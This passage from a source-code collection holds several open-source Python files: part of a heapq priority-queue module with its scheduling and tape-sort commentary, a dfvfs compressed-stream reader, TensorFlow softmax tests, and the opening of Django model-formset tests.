but the top cell "wins" over the two topped cells.
If this heap invariant is protected at all time, index 0 is clearly
the overall winner. The simplest algorithmic way to remove it and
find the "next" winner is to move some loser (let's say cell 30 in the
diagram above) into the 0 position, and then percolate this new 0 down
the tree, exchanging values, until the invariant is re-established.
This is clearly logarithmic on the total number of items in the tree.
By iterating over all items, you get an O(n ln n) sort.
A nice feature of this sort is that you can efficiently insert new
items while the sort is going on, provided that the inserted items are
not "better" than the last 0'th element you extracted. This is
especially useful in simulation contexts, where the tree holds all
incoming events, and the "win" condition means the smallest scheduled
time. When an event schedules other events for execution, they are
scheduled into the future, so they can easily go into the heap. So, a
heap is a good structure for implementing schedulers (this is what I
used for my MIDI sequencer :-).
Various structures for implementing schedulers have been extensively
studied, and heaps are good for this, as they are reasonably speedy,
the speed is almost constant, and the worst case is not much different
than the average case. However, there are other representations which
are more efficient overall, yet the worst cases might be terrible.
Heaps are also very useful in big disk sorts. You most probably all
know that a big sort implies producing "runs" (which are pre-sorted
sequences, whose size is usually related to the amount of CPU memory),
followed by merging passes for these runs, and this merging is often
very cleverly organised[1]. It is very important that the initial
sort produces the longest runs possible. Tournaments are a good way
to achieve that. If, using all the memory available to hold a tournament, you
replace and percolate items that happen to fit the current run, you'll
produce runs which are twice the size of the memory for random input,
and much better for input fuzzily ordered.
Moreover, if you output the 0'th item on disk and get an input which
may not fit in the current tournament (because the value "wins" over
the last output value), it cannot fit in the heap, so the size of the
heap decreases. The freed memory could be cleverly reused immediately
for progressively building a second heap, which grows at exactly the
same rate the first heap is melting. When the first heap completely
vanishes, you switch heaps and start a new run. Clever and quite
effective!
In a word, heaps are useful memory structures to know. I use them in
a few applications, and I think it is good to keep a `heap' module
around. :-)
--------------------
[1] The disk balancing algorithms which are current, nowadays, are
more annoying than clever, and this is a consequence of the seeking
capabilities of the disks. On devices which cannot seek, like big
tape drives, the story was quite different, and one had to be very
clever to ensure (far in advance) that each tape movement will be the
most effective possible (that is, will best participate at
"progressing" the merge). Some tapes were even able to read
backwards, and this was also used to avoid the rewinding time.
Believe me, real good tape sorts were quite spectacular to watch!
From all times, sorting has always been a Great Art! :-)
"""
__all__ = ['heappush', 'heappop', 'heapify', 'heapreplace', 'merge',
'nlargest', 'nsmallest', 'heappushpop']
from itertools import islice, count, tee, chain
def heappush(heap, item):
"""Push item onto heap, maintaining the heap invariant."""
heap.append(item)
_siftdown(heap, 0, len(heap)-1)
def heappop(heap):
"""Pop the smallest item off the heap, maintaining the heap invariant."""
lastelt = heap.pop() # raises appropriate IndexError if heap is empty
if heap:
returnitem = heap[0]
heap[0] = lastelt
_siftup(heap, 0)
else:
returnitem = lastelt
return returnitem
def heapreplace(heap, item):
"""Pop and return the current smallest value, and add the new item.
This is more efficient than heappop() followed by heappush(), and can be
more appropriate when using a fixed-size heap. Note that the value
returned may be larger than item! That constrains reasonable uses of
this routine unless written as part of a conditional replacement:
if item > heap[0]:
item = heapreplace(heap, item)
"""
returnitem = heap[0] # raises appropriate IndexError if heap is empty
heap[0] = item
_siftup(heap, 0)
return returnitem
def heappushpop(heap, item):
"""Fast version of a heappush followed by a heappop."""
if heap and heap[0] < item:
item, heap[0] = heap[0], item
_siftup(heap, 0)
return item
def heapify(x):
"""Transform list into a heap, in-place, in O(len(x)) time."""
n = len(x)
# Transform bottom-up. The largest index there's any point to looking at
# is the largest with a child index in-range, so must have 2*i + 1 < n,
# or i < (n-1)/2. If n is even = 2*j, this is (2*j-1)/2 = j-1/2 so
# j-1 is the largest, which is n//2 - 1. If n is odd = 2*j+1, this is
# (2*j+1-1)/2 = j so j-1 is the largest, and that's again n//2-1.
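    # Editor's note (worked example of the bound above): for n = 10 the
    # child-bearing indices satisfy 2*i + 1 < 10, i.e. i <= 4 = 10//2 - 1;
    # for n = 11, 2*i + 1 < 11 likewise gives i <= 4 = 11//2 - 1.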
for i in reversed(range(n//2)):
_siftup(x, i)
def _heappushpop_max(heap, item):
"""Maxheap version of a heappush followed by a heappop."""
if heap and item < heap[0]:
item, heap[0] = heap[0], item
_siftup_max(heap, 0)
return item
def _heapify_max(x):
"""Transform list into a maxheap, in-place, in O(len(x)) time."""
n = len(x)
for i in reversed(range(n//2)):
_siftup_max(x, i)
def nlargest(n, iterable):
"""Find the n largest elements in a dataset.
Equivalent to: sorted(iterable, reverse=True)[:n]
"""
if n < 0:
return []
it = iter(iterable)
result = list(islice(it, n))
if not result:
return result
heapify(result)
_heappushpop = heappushpop
for elem in it:
_heappushpop(result, elem)
result.sort(reverse=True)
return result
def nsmallest(n, iterable):
"""Find the n smallest elements in a dataset.
Equivalent to: sorted(iterable)[:n]
"""
if n < 0:
return []
it = iter(iterable)
result = list(islice(it, n))
if not result:
return result
_heapify_max(result)
_heappushpop = _heappushpop_max
for elem in it:
_heappushpop(result, elem)
result.sort()
return result
# 'heap' is a heap at all indices >= startpos, except possibly for pos. pos
# is the index of a leaf with a possibly out-of-order value. Restore the
# heap invariant.
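# Editor's note, an illustrative trace (not original module text): appending
# 0 to the valid heap [1, 3, 2, 7] gives [1, 3, 2, 7, 0]; _siftdown(heap, 0, 4)
# then moves the parents 3 and 1 down one level each and places the new item
# at the root, yielding the valid heap [0, 1, 2, 7, 3].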
def _siftdown(heap, startpos, pos):
newitem = heap[pos]
# Follow the path to the root, moving parents down until finding a place
# newitem fits.
while pos > startpos:
parentpos = (pos - 1) >> 1
parent = heap[parentpos]
if newitem < parent:
heap[pos] = parent
pos = parentpos
continue
break
heap[pos] = newitem
# The child indices of heap index pos are already heaps, and we want to make
# a heap at index pos too. We do this by bubbling the smaller child of
# pos up (and so on with that child's children, etc) until hitting a leaf,
# then using _siftdown to move the oddball originally at index pos into place.
#
# We *could* break out of the loop as soon as we find a pos where newitem <=
# both its children, but turns out that's not a good idea, and despite that
# many books write the algorithm that way. During a heap pop, the last array
# element is sifted in, and that tends to be large, so that comparing it
# against values starting from the root usually doesn't pay (= usually doesn't
# get us out of the loop early). See Knuth, Volume 3, where this is
# explained and quantified in an exercise.
#
# Cutting the # of comparisons is important, since these routines have no
# way to extract "the priority" from an array element, so that intelligence
# is likely to be hiding in custom comparison methods, or in array elements
# storing (priority, record) tuples. Comparisons are thus potentially
# expensive.
#
# On random arrays of length 1000, making this change cut the number of
# comparisons made by heapify() a little, and those made by exhaustive
# heappop() a lot, in accord with theory. Here are typical results from 3
# runs (3 just to demonstrate how small the variance is):
#
# Compares needed by heapify Compares needed by 1000 heappops
# -------------------------- --------------------------------
# 1837 cut to 1663 14996 cut to 8680
# 1855 cut to 1659 14966 cut to 8678
# 1847 cut to 1660 15024 cut to 8703
#
# Building the heap by using heappush() 1000 times instead required
# 2198, 2148, and 2219 compares: heapify() is more efficient, when
# you can use it.
#
# The total compares needed by list.sort() on the same lists were 8627,
# 8627, and 8632 (this should be compared to the sum of heapify() and
# heappop() compares): list.sort() is (unsurprisingly!) more efficient
# for sorting.
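# Editor's note, an illustrative trace of the two-phase strategy (not original
# module text): popping from [0, 1, 2, 7, 3] moves the trailing 3 to the root,
# giving [3, 1, 2, 7]; _siftup then bubbles the smaller child up at each level
# (1, then 7) until the hole reaches a leaf, and the final _siftdown call
# settles 3 into place, leaving the valid heap [1, 3, 2, 7].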
def _siftup(heap, pos):
endpos = len(heap)
startpos = pos
newitem = heap[pos]
# Bubble up the smaller child until hitting a leaf.
childpos = 2*pos + 1 # leftmost child position
while childpos < endpos:
# Set childpos to index of smaller child.
rightpos = childpos + 1
if rightpos < endpos and not heap[childpos] < heap[rightpos]:
childpos = rightpos
# Move the smaller child up.
heap[pos] = heap[childpos]
pos = childpos
childpos = 2*pos + 1
# The leaf at pos is empty now. Put newitem there, and bubble it up
# to its final resting place (by sifting its parents down).
heap[pos] = newitem
_siftdown(heap, startpos, pos)
def _siftdown_max(heap, startpos, pos):
'Maxheap variant of _siftdown'
newitem = heap[pos]
# Follow the path to the root, moving parents down until finding a place
# newitem fits.
while pos > startpos:
parentpos = (pos - 1) >> 1
parent = heap[parentpos]
if parent < newitem:
heap[pos] = parent
pos = parentpos
continue
break
heap[pos] = newitem
def _siftup_max(heap, pos):
'Maxheap variant of _siftup'
endpos = len(heap)
startpos = pos
newitem = heap[pos]
# Bubble up the larger child until hitting a leaf.
childpos = 2*pos + 1 # leftmost child position
while childpos < endpos:
# Set childpos to index of larger child.
rightpos = childpos + 1
if rightpos < endpos and not heap[rightpos] < heap[childpos]:
childpos = rightpos
# Move the larger child up.
heap[pos] = heap[childpos]
pos = childpos
childpos = 2*pos + 1
# The leaf at pos is empty now. Put newitem there, and bubble it up
# to its final resting place (by sifting its parents down).
heap[pos] = newitem
_siftdown_max(heap, startpos, pos)
# If available, use C implementation
#_heapq does not exist in brython, so lets just comment it out.
#try:
# from _heapq import *
#except ImportError:
# pass
def merge(*iterables):
'''Merge multiple sorted inputs into a single sorted output.
Similar to sorted(itertools.chain(*iterables)) but returns a generator,
does not pull the data into memory all at once, and assumes that each of
the input streams is already sorted (smallest to largest).
>>> list(merge([1,3,5,7], [0,2,4,8], [5,10,15,20], [], [25]))
[0, 1, 2, 3, 4, 5, 5, 7, 8, 10, 15, 20, 25]
'''
_heappop, _heapreplace, _StopIteration = heappop, heapreplace, StopIteration
_len = len
h = []
h_append = h.append
for itnum, it in enumerate(map(iter, iterables)):
try:
next = it.__next__
h_append([next(), itnum, next])
except _StopIteration:
pass
heapify(h)
while _len(h) > 1:
try:
while True:
v, itnum, next = s = h[0]
yield v
s[0] = next() # raises StopIteration when exhausted
_heapreplace(h, s) # restore heap condition
except _StopIteration:
_heappop(h) # remove empty iterator
if h:
# fast case when only a single iterator remains
v, itnum, next = h[0]
yield v
yield from next.__self__
# Extend the implementations of nsmallest and nlargest to use a key= argument
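# Editor's note: the wrappers below use the decorate-sort-undecorate pattern;
# count() supplies a unique, monotonically changing tiebreaker so the heap
# never has to compare the (possibly non-comparable) records themselves, and
# nlargest() counts downwards (count(0, -1)) so that, on equal keys, earlier
# items rank higher and the selection stays stable.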
_nsmallest = nsmallest
def nsmallest(n, iterable, key=None):
"""Find the n smallest elements in a dataset.
Equivalent to: sorted(iterable, key=key)[:n]
"""
# Short-cut for n==1 is to use min() when len(iterable)>0
if n == 1:
it = iter(iterable)
head = list(islice(it, 1))
if not head:
return []
if key is None:
return [min(chain(head, it))]
return [min(chain(head, it), key=key)]
# When n>=size, it's faster to use sorted()
try:
size = len(iterable)
except (TypeError, AttributeError):
pass
else:
if n >= size:
return sorted(iterable, key=key)[:n]
    # When key is None, use simpler decoration
if key is None:
it = zip(iterable, count()) # decorate
result = _nsmallest(n, it)
return [r[0] for r in result] # undecorate
# General case, slowest method
in1, in2 = tee(iterable)
it = zip(map(key, in1), count(), in2) # decorate
result = _nsmallest(n, it)
return [r[2] for r in result] # undecorate
_nlargest = nlargest
def nlargest(n, iterable, key=None):
"""Find the n largest elements in a dataset.
Equivalent to: sorted(iterable, key=key, reverse=True)[:n]
"""
# Short-cut for n==1 is to use max() when len(iterable)>0
if n == 1:
it = iter(iterable)
head = list(islice(it, 1))
if not head:
return []
if key is None:
return [max(chain(head, it))]
return [max(chain(head, it), key=key)]
# When n>=size, it's faster to use sorted()
try:
size = len(iterable)
except (TypeError, AttributeError):
pass
else:
if n >= size:
return sorted(iterable, key=key, reverse=True)[:n]
    # When key is None, use simpler decoration
if key is None:
it = zip(iterable, count(0,-1)) # decorate
result = _nlargest(n, it)
return [r[0] for r in result] # undecorate
# General case, slowest method
in1, in2 = tee(iterable)
it = zip(map(key, in1), count(0,-1), in2) # decorate
result = _nlargest(n, it)
return [r[2] for r in result] # undecorate
if __name__ == "__main__":
# Simple sanity test
heap = []
data = [1, 3, 5, 7, 9, 2, 4, 6, 8, 0]
for item in data:
heappush(heap, item)
sort = []
while heap:
sort.append(heappop(heap))
print(sort)
import doctest
doctest.testmod()
| agpl-3.0 |
log2timeline/dfvfs | dfvfs/file_io/compressed_stream_io.py | 2 | 9519 | # -*- coding: utf-8 -*-
"""The compressed stream file-like object implementation."""
import os
from dfvfs.compression import manager as compression_manager
from dfvfs.file_io import file_io
from dfvfs.lib import errors
from dfvfs.resolver import resolver
class CompressedStream(file_io.FileIO):
"""File input/output (IO) object of a compressed stream."""
# The size of the compressed data buffer.
_COMPRESSED_DATA_BUFFER_SIZE = 8 * 1024 * 1024
def __init__(self, resolver_context, path_spec):
"""Initializes a file input/output (IO) object.
Args:
resolver_context (Context): resolver context.
path_spec (PathSpec): a path specification.
"""
super(CompressedStream, self).__init__(resolver_context, path_spec)
self._compression_method = None
self._file_object = None
self._compressed_data = b''
self._current_offset = 0
self._decompressor = None
self._realign_offset = True
self._uncompressed_data = b''
self._uncompressed_data_offset = 0
self._uncompressed_data_size = 0
self._uncompressed_stream_size = None
def _Close(self):
"""Closes the file-like object.
    If the file-like object was passed in the init function,
the compressed stream file-like object does not control
the file-like object and should not actually close it.
"""
self._compressed_data = b''
self._file_object = None
self._decompressor = None
self._uncompressed_data = b''
def _GetDecompressor(self):
"""Retrieves the decompressor.
Returns:
Decompressor: decompressor.
"""
return compression_manager.CompressionManager.GetDecompressor(
self._compression_method)
def _GetUncompressedStreamSize(self):
"""Retrieves the uncompressed stream size.
Returns:
int: uncompressed stream size.
"""
self._file_object.seek(0, os.SEEK_SET)
self._decompressor = self._GetDecompressor()
self._uncompressed_data = b''
compressed_data_offset = 0
compressed_data_size = self._file_object.get_size()
uncompressed_stream_size = 0
while compressed_data_offset < compressed_data_size:
read_count = self._ReadCompressedData(self._COMPRESSED_DATA_BUFFER_SIZE)
if read_count == 0:
break
compressed_data_offset += read_count
uncompressed_stream_size += self._uncompressed_data_size
return uncompressed_stream_size
def _Open(self, mode='rb'):
"""Opens the file-like object.
Args:
mode (Optional[str]): file access mode.
Raises:
AccessError: if the access to open the file was denied.
IOError: if the file-like object could not be opened.
OSError: if the file-like object could not be opened.
PathSpecError: if the path specification is incorrect.
"""
if not self._path_spec.HasParent():
raise errors.PathSpecError(
'Unsupported path specification without parent.')
self._compression_method = getattr(
self._path_spec, 'compression_method', None)
if self._compression_method is None:
raise errors.PathSpecError(
'Path specification missing compression method.')
self._file_object = resolver.Resolver.OpenFileObject(
self._path_spec.parent, resolver_context=self._resolver_context)
def _AlignUncompressedDataOffset(self, uncompressed_data_offset):
"""Aligns the compressed file with the uncompressed data offset.
Args:
uncompressed_data_offset (int): uncompressed data offset.
"""
self._file_object.seek(0, os.SEEK_SET)
self._decompressor = self._GetDecompressor()
self._uncompressed_data = b''
compressed_data_offset = 0
compressed_data_size = self._file_object.get_size()
while compressed_data_offset < compressed_data_size:
read_count = self._ReadCompressedData(self._COMPRESSED_DATA_BUFFER_SIZE)
if read_count == 0:
break
compressed_data_offset += read_count
if uncompressed_data_offset < self._uncompressed_data_size:
self._uncompressed_data_offset = uncompressed_data_offset
break
uncompressed_data_offset -= self._uncompressed_data_size
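  # Editor's note: the compressed parent stream offers no random access, so
  # _AlignUncompressedDataOffset() realigns by rewinding the parent file
  # object and decompressing from the start until the requested uncompressed
  # offset is reached; any seek to a different offset therefore costs a full
  # re-decompression up to that point on the next read().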
def _ReadCompressedData(self, read_size):
"""Reads compressed data from the file-like object.
Args:
read_size (int): number of bytes of compressed data to read.
Returns:
int: number of bytes of compressed data read.
"""
compressed_data = self._file_object.read(read_size)
read_count = len(compressed_data)
self._compressed_data = b''.join([self._compressed_data, compressed_data])
self._uncompressed_data, self._compressed_data = (
self._decompressor.Decompress(self._compressed_data))
self._uncompressed_data_size = len(self._uncompressed_data)
return read_count
  # Note: the following functions do not follow the style guide
# because they are part of the file-like object interface.
# pylint: disable=invalid-name
def read(self, size=None):
"""Reads a byte string from the file-like object at the current offset.
The function will read a byte string of the specified size or
all of the remaining data if no size was specified.
Args:
size (Optional[int]): number of bytes to read, where None is all
remaining data.
Returns:
bytes: data read.
Raises:
IOError: if the read failed.
OSError: if the read failed.
"""
if not self._is_open:
raise IOError('Not opened.')
if self._current_offset < 0:
raise IOError(
'Invalid current offset: {0:d} value less than zero.'.format(
self._current_offset))
if self._uncompressed_stream_size is None:
self._uncompressed_stream_size = self._GetUncompressedStreamSize()
if self._uncompressed_stream_size < 0:
raise IOError('Invalid uncompressed stream size.')
if self._current_offset >= self._uncompressed_stream_size:
return b''
if self._realign_offset:
self._AlignUncompressedDataOffset(self._current_offset)
self._realign_offset = False
if size is None:
size = self._uncompressed_stream_size
if self._current_offset + size > self._uncompressed_stream_size:
size = self._uncompressed_stream_size - self._current_offset
uncompressed_data = b''
if size == 0:
return uncompressed_data
while size > self._uncompressed_data_size:
uncompressed_data = b''.join([
uncompressed_data,
self._uncompressed_data[self._uncompressed_data_offset:]])
remaining_uncompressed_data_size = (
self._uncompressed_data_size - self._uncompressed_data_offset)
self._current_offset += remaining_uncompressed_data_size
size -= remaining_uncompressed_data_size
if self._current_offset >= self._uncompressed_stream_size:
break
read_count = self._ReadCompressedData(self._COMPRESSED_DATA_BUFFER_SIZE)
self._uncompressed_data_offset = 0
if read_count == 0:
break
if size > 0:
slice_start_offset = self._uncompressed_data_offset
slice_end_offset = slice_start_offset + size
uncompressed_data = b''.join([
uncompressed_data,
self._uncompressed_data[slice_start_offset:slice_end_offset]])
self._uncompressed_data_offset += size
self._current_offset += size
return uncompressed_data
def seek(self, offset, whence=os.SEEK_SET):
"""Seeks to an offset within the file-like object.
Args:
offset (int): offset to seek to.
      whence (Optional[int]): value that indicates whether offset is an absolute
or relative position within the file.
Raises:
IOError: if the seek failed.
OSError: if the seek failed.
"""
if not self._is_open:
raise IOError('Not opened.')
if self._current_offset < 0:
raise IOError(
'Invalid current offset: {0:d} value less than zero.'.format(
self._current_offset))
if whence == os.SEEK_CUR:
offset += self._current_offset
elif whence == os.SEEK_END:
if self._uncompressed_stream_size is None:
self._uncompressed_stream_size = self._GetUncompressedStreamSize()
if self._uncompressed_stream_size is None:
raise IOError('Invalid uncompressed stream size.')
offset += self._uncompressed_stream_size
elif whence != os.SEEK_SET:
raise IOError('Unsupported whence.')
if offset < 0:
raise IOError('Invalid offset value less than zero.')
if offset != self._current_offset:
self._current_offset = offset
self._realign_offset = True
def get_offset(self):
"""Retrieves the current offset into the file-like object.
Returns:
int: current offset in the uncompressed stream.
Raises:
IOError: if the file-like object has not been opened.
OSError: if the file-like object has not been opened.
"""
if not self._is_open:
raise IOError('Not opened.')
return self._current_offset
def get_size(self):
"""Retrieves the size of the file-like object.
Returns:
int: size of the uncompressed stream.
Raises:
IOError: if the file-like object has not been opened.
OSError: if the file-like object has not been opened.
"""
if not self._is_open:
raise IOError('Not opened.')
if self._uncompressed_stream_size is None:
self._uncompressed_stream_size = self._GetUncompressedStreamSize()
return self._uncompressed_stream_size
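# Editor's note, a hypothetical usage sketch (not part of the original
# module): CompressedStream is normally reached through the resolver. Build a
# path specification for the compressed file, wrap it in a path specification
# that carries a `compression_method` attribute and the original spec as its
# parent (see _Open() above), and pass it to resolver.Resolver.OpenFileObject();
# the returned file-like object can then be read() and seek()ed as shown above.
# The concrete path-spec classes live elsewhere in dfvfs and are assumed here.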
| apache-2.0 |
ppries/tensorflow | tensorflow/python/kernel_tests/softmax_op_test.py | 11 | 6928 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SoftmaxOp and LogSoftmaxOp."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import numpy as np
import tensorflow as tf
class SoftmaxTest(tf.test.TestCase):
def _npSoftmax(self, features, dim=-1, log=False):
    if dim == -1:
dim = len(features.shape) - 1
one_only_on_dim = list(features.shape)
one_only_on_dim[dim] = 1
e = np.exp(features - np.reshape(
np.amax(
features, axis=dim), one_only_on_dim))
softmax = e / np.reshape(np.sum(e, axis=dim), one_only_on_dim)
if log:
return np.log(softmax)
else:
return softmax
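  # Editor's note: _npSoftmax above uses the standard numerical-stability
  # trick, softmax(x)_i = exp(x_i - max(x)) / sum_j exp(x_j - max(x)), which
  # equals exp(x_i) / sum_j exp(x_j) exactly but avoids overflow for large
  # inputs (exercised by _testOverflow below).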
def _testSoftmax(self, np_features, dim=-1, log=False, use_gpu=False):
# A previous version of the code checked the op name rather than the op type
# to distinguish between log and non-log. Use an arbitrary name to catch
# this bug in future.
name = "arbitrary"
np_softmax = self._npSoftmax(np_features, dim=dim, log=log)
with self.test_session(use_gpu=use_gpu):
if log:
tf_softmax = tf.nn.log_softmax(np_features, dim=dim, name=name)
else:
tf_softmax = tf.nn.softmax(np_features, dim=dim, name=name)
out = tf_softmax.eval()
self.assertAllCloseAccordingToType(np_softmax, out)
self.assertShapeEqual(np_softmax, tf_softmax)
if not log:
# Bonus check: the softmaxes should add to one in dimension dim.
sum_along_dim = np.sum(out, axis=dim)
self.assertAllCloseAccordingToType(
np.ones(sum_along_dim.shape), sum_along_dim)
def _testAll(self, features):
self._testSoftmax(features, use_gpu=False)
self._testSoftmax(features, log=True, use_gpu=False)
self._testSoftmax(features, use_gpu=True)
self._testSoftmax(features, log=True, use_gpu=True)
self._testOverflow(use_gpu=True)
def testNpSoftmax(self):
features = [[1., 1., 1., 1.], [1., 2., 3., 4.]]
# Batch 0: All exps are 1. The expected result is
# Softmaxes = [0.25, 0.25, 0.25, 0.25]
# LogSoftmaxes = [-1.386294, -1.386294, -1.386294, -1.386294]
#
# Batch 1:
# exps = [1., 2.718, 7.389, 20.085]
# sum = 31.192
# Softmaxes = exps / sum = [0.0320586, 0.08714432, 0.23688282, 0.64391426]
# LogSoftmaxes = [-3.44019 , -2.44019 , -1.44019 , -0.44019]
np_sm = self._npSoftmax(np.array(features))
self.assertAllClose(
np.array([[0.25, 0.25, 0.25, 0.25],
[0.0320586, 0.08714432, 0.23688282, 0.64391426]]),
np_sm,
rtol=1.e-5, atol=1.e-5)
np_lsm = self._npSoftmax(np.array(features), log=True)
self.assertAllClose(
np.array([[-1.386294, -1.386294, -1.386294, -1.386294],
[-3.4401897, -2.4401897, -1.4401897, -0.4401897]]),
np_lsm,
rtol=1.e-5, atol=1.e-5)
def _testOverflow(self, use_gpu=False):
if use_gpu:
type = np.float32
else:
type = np.float64
max = np.finfo(type).max
features = np.array(
[[1., 1., 1., 1.],
[max, 1., 2., 3.]]).astype(type)
with self.test_session(use_gpu=use_gpu):
tf_log_softmax = tf.nn.log_softmax(features)
out = tf_log_softmax.eval()
self.assertAllClose(
np.array([[-1.386294, -1.386294, -1.386294, -1.386294],
[0, -max, -max, -max]]),
out,
rtol=1.e-5, atol=1.e-5)
def testFloat(self):
self._testAll(
np.array([[1., 1., 1., 1.], [1., 2., 3., 4.]]).astype(np.float32))
def testHalf(self):
self._testAll(
np.array([[1., 1., 1., 1.], [1., 2., 3., 4.]]).astype(np.float16))
def testDouble(self):
self._testSoftmax(
np.array([[1., 1., 1., 1.], [1., 2., 3., 4.]]).astype(np.float64))
self._testOverflow()
  def test1DTensorAsInput(self):
self._testSoftmax(
np.array([3., 2., 3., 9.]).astype(np.float64), use_gpu=False)
self._testOverflow(use_gpu=False)
def test3DTensorAsInput(self):
self._testSoftmax(
np.array([[[1., 1., 1., 1.], [1., 2., 3., 4.]],
[[2., 3., 4., 5.], [6., 7., 8., 9.]],
[[5., 4., 3., 2.], [1., 2., 3., 4.]]]).astype(np.float32),
use_gpu=False)
self._testOverflow(use_gpu=False)
def testAlongFirstDimension(self):
self._testSoftmax(
np.array([[[1., 1., 1., 1.], [1., 2., 3., 4.]],
[[2., 3., 4., 5.], [6., 7., 8., 9.]],
[[5., 4., 3., 2.], [1., 2., 3., 4.]]]).astype(np.float32),
dim=0,
use_gpu=False)
self._testOverflow(use_gpu=False)
def testAlongSecondDimension(self):
self._testSoftmax(
np.array([[[1., 1., 1., 1.], [1., 2., 3., 4.]],
[[2., 3., 4., 5.], [6., 7., 8., 9.]],
[[5., 4., 3., 2.], [1., 2., 3., 4.]]]).astype(np.float32),
dim=1,
use_gpu=False)
self._testOverflow(use_gpu=False)
def testShapeInference(self):
op = tf.nn.softmax([[[1., 1., 1., 1.], [1., 2., 3., 4.]],
[[2., 3., 4., 5.], [6., 7., 8., 9.]],
[[5., 4., 3., 2.], [1., 2., 3., 4.]]])
self.assertEqual([3, 2, 4], op.get_shape())
def testEmptyInput(self):
with self.test_session():
x = tf.constant([[]], shape=[0, 3])
self.assertEqual(0, tf.size(x).eval())
# reshape would raise if logits is empty
with self.assertRaises(tf.errors.InvalidArgumentError):
tf.nn.softmax(x, dim=0).eval()
def testDimTooLarge(self):
with self.test_session():
with self.assertRaises(tf.errors.InvalidArgumentError):
tf.nn.softmax([1., 2., 3., 4.], dim=100).eval()
def testLargeDims(self):
# Make sure that we properly handle large inputs. See
# https://github.com/tensorflow/tensorflow/issues/4425 for details
for dims in [129, 256]:
ones = np.random.rand(dims, dims).astype(np.float32)
np_softmax = self._npSoftmax(ones)
for use_gpu in [True, False]:
with self.test_session(use_gpu=use_gpu) as sess:
x = tf.placeholder(tf.float32)
y = tf.nn.softmax(x)
tf_softmax = sess.run(y, feed_dict={x: ones})
self.assertAllClose(tf_softmax, np_softmax)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 |
vipul-sharma20/oh-mainline | vendor/packages/Django/tests/modeltests/model_formsets/tests.py | 51 | 61280 | from __future__ import absolute_import, unicode_literals
import datetime
import re
from datetime import date
from decimal import Decimal
from django import forms
from django.db import models
from django.forms.models import (_get_foreign_key, inlineformset_factory,
modelformset_factory)
from django.test import TestCase, skipUnlessDBFeature
from django.utils import six
from .models import (Author, BetterAuthor, Book, BookWithCustomPK,
BookWithOptionalAltEditor, AlternateBook, AuthorMeeting, CustomPrimaryKey,
Place, Owner, Location, OwnerProfile, Restaurant, Product, Price,
MexicanRestaurant, ClassyMexicanRestaurant, Repository, Revision,
Person, Membership, Team, Player, Poet, Poem, Post)
class DeletionTests(TestCase):
def test_deletion(self):
PoetFormSet = modelformset_factory(Poet, can_delete=True)
poet = Poet.objects.create(name='test')
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '1',
'form-MAX_NUM_FORMS': '0',
'form-0-id': str(poet.pk),
'form-0-name': 'test',
'form-0-DELETE': 'on',
}
formset = PoetFormSet(data, queryset=Poet.objects.all())
formset.save()
self.assertTrue(formset.is_valid())
self.assertEqual(Poet.objects.count(), 0)
def test_add_form_deletion_when_invalid(self):
"""
Make sure that an add form that is filled out, but marked for deletion
doesn't cause validation errors.
"""
PoetFormSet = modelformset_factory(Poet, can_delete=True)
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '0',
'form-0-id': '',
'form-0-name': 'x' * 1000,
}
formset = PoetFormSet(data, queryset=Poet.objects.all())
# Make sure this form doesn't pass validation.
self.assertEqual(formset.is_valid(), False)
self.assertEqual(Poet.objects.count(), 0)
# Then make sure that it *does* pass validation and delete the object,
# even though the data isn't actually valid.
data['form-0-DELETE'] = 'on'
formset = PoetFormSet(data, queryset=Poet.objects.all())
self.assertEqual(formset.is_valid(), True)
formset.save()
self.assertEqual(Poet.objects.count(), 0)
def test_change_form_deletion_when_invalid(self):
"""
Make sure that an add form that is filled out, but marked for deletion
doesn't cause validation errors.
"""
PoetFormSet = modelformset_factory(Poet, can_delete=True)
poet = Poet.objects.create(name='test')
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '1',
'form-MAX_NUM_FORMS': '0',
'form-0-id': six.text_type(poet.id),
'form-0-name': 'x' * 1000,
}
formset = PoetFormSet(data, queryset=Poet.objects.all())
# Make sure this form doesn't pass validation.
self.assertEqual(formset.is_valid(), False)
self.assertEqual(Poet.objects.count(), 1)
# Then make sure that it *does* pass validation and delete the object,
# even though the data isn't actually valid.
data['form-0-DELETE'] = 'on'
formset = PoetFormSet(data, queryset=Poet.objects.all())
self.assertEqual(formset.is_valid(), True)
formset.save()
self.assertEqual(Poet.objects.count(), 0)
class ModelFormsetTest(TestCase):
def test_simple_save(self):
qs = Author.objects.all()
AuthorFormSet = modelformset_factory(Author, extra=3)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" maxlength="100" /><input type="hidden" name="form-0-id" id="id_form-0-id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_form-1-name">Name:</label> <input id="id_form-1-name" type="text" name="form-1-name" maxlength="100" /><input type="hidden" name="form-1-id" id="id_form-1-id" /></p>')
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_form-2-name">Name:</label> <input id="id_form-2-name" type="text" name="form-2-name" maxlength="100" /><input type="hidden" name="form-2-id" id="id_form-2-id" /></p>')
data = {
'form-TOTAL_FORMS': '3', # the number of forms rendered
'form-INITIAL_FORMS': '0', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-name': 'Charles Baudelaire',
'form-1-name': 'Arthur Rimbaud',
'form-2-name': '',
}
formset = AuthorFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 2)
author1, author2 = saved
self.assertEqual(author1, Author.objects.get(name='Charles Baudelaire'))
self.assertEqual(author2, Author.objects.get(name='Arthur Rimbaud'))
authors = list(Author.objects.order_by('name'))
self.assertEqual(authors, [author2, author1])
